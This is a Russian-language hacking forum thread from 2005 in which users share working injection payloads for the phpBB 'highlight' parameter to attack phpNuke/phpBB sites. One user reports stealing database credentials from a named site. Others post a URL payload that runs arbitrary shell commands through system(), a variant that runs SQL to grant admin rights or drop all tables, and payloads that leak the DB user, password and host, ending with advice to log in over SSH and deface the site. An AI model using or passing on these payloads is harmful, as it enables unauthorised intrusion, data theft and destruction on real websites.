Форумы phpnuke

Discussion in 'Уязвимости CMS/форумов' started by (-=util=-), 18 Feb 2005.

  1. (-=util=-)

    (-=util=-) Banned

    Joined:
    2 Dec 2004
    Messages:
    337
    Likes Received:
    8
    Reputations:
    2
    Зашёл на портал на движке phpпуке
    Допустим www.mega-lol.net
    Стырил пароль от базы и имя

    &highlight=%2527.$poster=$dbpass.%2527
    &highlight=%2527.$poster=$dbname.%2527

    Как мне быть дальше?
     
    #1 (-=util=-), 18 Feb 2005
    Last edited: 18 Feb 2005
  2. KEZ

    KEZ Guest

    Reputations:
    0
    Так. Серьезно. Ответь, сколько ты куриш?
    Ты зря этим делом занимаешься,
    если бы не курил ПЛАН, знал бы что
    highlight в phpBB ))

    Если ты там стырил пас от MySQL, то теперь делай так
    Напиши его в блокнот
    Закрой блокнот
    Не сохраняй изменения
    Забей на пароль

    Теперь используй сплойт чтобы выполнить произвольные комманды на уязвимой с-ме!))

    Уже писал МИЛИОН раз про highlight.
    И ещё напишу
    viewtopic.php?xxx=uname -a&t=[TOPIC]&highlight=%2527.system($_GET[xxx]).include%2527

    Незабудь вместо [TOPIC] поставить номер топика
     
    #2 KEZ, 18 Feb 2005
    Last edited by a moderator: 18 Feb 2005
  3. (-=util=-)

    (-=util=-) Banned

    Joined:
    2 Dec 2004
    Messages:
    337
    Likes Received:
    8
    Reputations:
    2
    Спасибо, неленивый ты :)
    Я некурю))))
     
  4. KEZ

    KEZ Guest

    Reputations:
    0
    Спасибо ))
     
  5. rsha1988

    rsha1988 Elder - Старейшина

    Joined:
    3 Jan 2005
    Messages:
    230
    Likes Received:
    3
    Reputations:
    0
    xxx- эт что?
    uname- эт что?
     
  6. KEZ

    KEZ Guest

    Reputations:
    0
    xxx - это параметр в строке в который нужно писать команду, ее запустит system()
    uname - это команда nix показывающая версию ОС и другое. с параметром a - версию Linux
     
  7. temon

    temon Elder - Старейшина

    Joined:
    6 Feb 2005
    Messages:
    114
    Likes Received:
    4
    Reputations:
    0
    Ребята прошу вас объясните мне ламеру, как нужнно взламывать сайты на Phpnuke.
    как ни стараюсь не получается. прошу вас помггите.
     
  8. (-=util=-)

    (-=util=-) Banned

    Joined:
    2 Dec 2004
    Messages:
    337
    Likes Received:
    8
    Reputations:
    2
    1. ага... сейчас остались критические уязвимости в нюке 7,5 7,6 ? На секьюрити только XSS и то херь :(

    2. 2KEZ, При создании нюка создаётся профиль базового админа форума (редактирование его параметров запрещено) Всё его данные находятся в бд определённой яцейке (название непоню сейчас точно) Можно ли с помощью

    &highlight=%2527.system($_GET[xxx]).include%2527

    Очистить данные этой ячейки, тем самым введя supersite.ru/admin.pnp создать по новой базового администратора?

    Danke... =)
     
  9. KEZ

    KEZ Guest

    Reputations:
    0
    Какие ячейки? Я тебе про ПЛАН говорил? )) Ладно шучу ))

    Вообщем если у тебя есть шелл (HTTP) я незнаю о каких админах ты можешь говорить...
    Ты можешь например делать вместо system($_GET[xxx]) mysql_query($_GET[xxx])
    и вместо xxx писать SQL команды
    Например UPDATE phpbb_users SET user_level=1 WHERE user_id=[ТВОЙ ID]
    Или стереть все таблицы...

    А phpNuke ТУТ ВООБЩЕ НЕ ПРИ ЧЕМ. Разве что phpBB бывает модулем в нюке.
     
  10. SladerNon

    SladerNon Адам

    Joined:
    6 Mar 2005
    Messages:
    1,636
    Likes Received:
    941
    Reputations:
    355
    Занимательно....., Спасибо!
     
  11. Xalegi

    Xalegi Elder - Старейшина

    Joined:
    24 Nov 2004
    Messages:
    109
    Likes Received:
    4
    Reputations:
    6
    так.... видать на вопрос не ответили ему =))

    &highlight=%2527.$poster=$dbname.%2527
    &highlight=%2527.$poster=$dbpass.%2527
    ничего полезного тебе НЕ ДАЮТ !!!!

    набери &highlight=%2527.$poster=$dbhost.%2527 еси там будет localhost, смело забивай на это дело...

    а так те надо набрать:
    &highlight=%2527.$poster=$dbuser.%2527
    &highlight=%2527.$poster=$dbpasswd.%2527

    это тебе даст логин и пароль от БД !!!

    далее конектишься по SSH туда и всего делов.. считай сайт взломан =))
    (у меня через это был первый дефейс:) )